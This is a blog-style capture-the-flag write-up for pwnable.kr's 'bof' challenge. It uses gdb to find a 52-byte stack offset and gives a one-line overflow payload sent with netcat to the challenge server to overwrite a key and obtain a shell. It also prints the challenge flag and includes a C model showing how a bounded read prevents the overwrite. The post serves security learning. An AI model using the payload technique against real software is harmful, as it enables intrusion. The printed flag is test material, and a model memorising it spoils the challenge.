Friday, December 14, 2018

HOWTO : Solution of bof at Toddler's Bottle

Toddler's Bottle is one of the CTF games at the pwnable.kr website. The game I am going to play is named bof. There are already many writeups on the Internet. However, I am going to explain what I learnt from this game.

Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof

Exploit Server : pwnable.kr:9000

The source code of the bof binary is provided. I examined the source code and found out that we need to change the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" variable is 32 characters long. Whatever you enter into the "overflowme" variable is never assigned to the "key", which is hard coded, so the only way to change it is to write past the end of the buffer. It is a buffer overflow challenge. However, we are not going to take control of the return address this time.



Load the binary in gdb with PEDA and run "checksec". It confirms that NX is enabled, along with other restrictions.

gdb -q ./bof



Run "disass main" to disassemble the "main" function.

disass main



Run "disass func" to disassemble the "func" function.

disass func



In the "func" function, I am interested in the following code.

0x00000649 <+29>:    lea  eax,[ebp-0x2c]
0x0000064c <+32>:    mov  DWORD PTR [esp],eax
0x0000064f <+35>:    call 0x650
0x00000654 <+40>:    cmp  DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>:    jne  0x66b

In "lea eax,[ebp-0x2c]", "ebp-0x2c" may be where the "overflowme" variable is stored, and its address is saved in the eax register.

In "cmp DWORD PTR [ebp+0x8],0xcafebabe", "ebp+0x8" may contain the value of "key", that is "0xdeadbeef".

I am going to set a breakpoint at "0x0000065b <+47>".

b *func+47



Then run the program with "r" and, when prompted, enter "helloworld" as the "overflowme" input.



After entering "helloworld", I am going to examine "eax" and "ebp+0x8".

x/x $ebp+0x8
x/s $eax




The result confirmed what I suspected. I am going to check the offset between the two addresses with Python. The offset is 52, which matches 0x2c + 0x8 from the disassembly.



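Once I have the offset, I am going to overwrite "0xdeadbeef" with "0xcafebabe" using the exploit code. The bytes are written in reverse order ("\xbe\xba\xfe\xca") because x86 is little-endian. The "cat" command keeps the connection open so that I can interact with the shell.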

(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000



The flag is :

daddy, I just pwned a buFFer :)
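
Why the offset is 52 and why a length-limited read stops the overwrite, as an added example that is not part of the original post or the challenge source. It models the bytes from "ebp-0x2c" to "ebp+0x8" as an array instead of touching a real stack; the names "frame", "frame_read" and "key_after" are hypothetical, and the bounded case assumes an fgets-style read limited to the 32-byte buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets from the disassembly above: buffer at ebp-0x2c, key at ebp+0x8. */
#define BUF_SIZE   32                 /* size of "overflowme" */
#define KEY_OFFSET (0x2c + 0x8)       /* distance from buffer start to key */
#define FRAME_SIZE (KEY_OFFSET + 4)   /* modelled bytes: buffer .. key */

/* Hypothetical model of the stack bytes between the buffer and the key. */
struct frame { uint8_t bytes[FRAME_SIZE]; };

static void frame_init(struct frame *f) {
    uint32_t key = 0xdeadbeef;
    memset(f->bytes, 0, sizeof f->bytes);
    memcpy(f->bytes + KEY_OFFSET, &key, sizeof key);
}

static uint32_t frame_key(const struct frame *f) {
    uint32_t key;
    memcpy(&key, f->bytes + KEY_OFFSET, sizeof key);
    return key;
}

/* bounded=0: read with no length limit (clamped to the model so the demo is
 * memory-safe). bounded=1: stops at BUF_SIZE-1 bytes and NUL-terminates. */
static void frame_read(struct frame *f, const uint8_t *in, size_t n, int bounded) {
    size_t limit = bounded ? BUF_SIZE - 1 : FRAME_SIZE;
    if (n > limit) n = limit;
    memcpy(f->bytes, in, n);
    if (bounded) f->bytes[n] = '\0';
}

/* Key value after reading `pad` filler bytes followed by a 4-byte value. */
uint32_t key_after(size_t pad, uint32_t value, int bounded) {
    uint8_t in[FRAME_SIZE + 16];      /* constructed input */
    struct frame f;
    if (pad > FRAME_SIZE) pad = FRAME_SIZE;
    memset(in, 'A', pad);
    memcpy(in + pad, &value, sizeof value);
    frame_init(&f);
    frame_read(&f, in, pad + sizeof value, bounded);
    return frame_key(&f);
}

int main(void) {
    printf("unbounded, pad 52: 0x%08x\n", (unsigned)key_after(52, 0xcafebabe, 0));
    printf("unbounded, pad 48: 0x%08x\n", (unsigned)key_after(48, 0xcafebabe, 0));
    printf("bounded,   pad 52: 0x%08x\n", (unsigned)key_after(52, 0xcafebabe, 1));
    return 0;
}
```

Only the unbounded read with exactly 52 filler bytes lands the value on the key; with the bounded read the key keeps its hard-coded value whatever the input length.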




That's all! See you.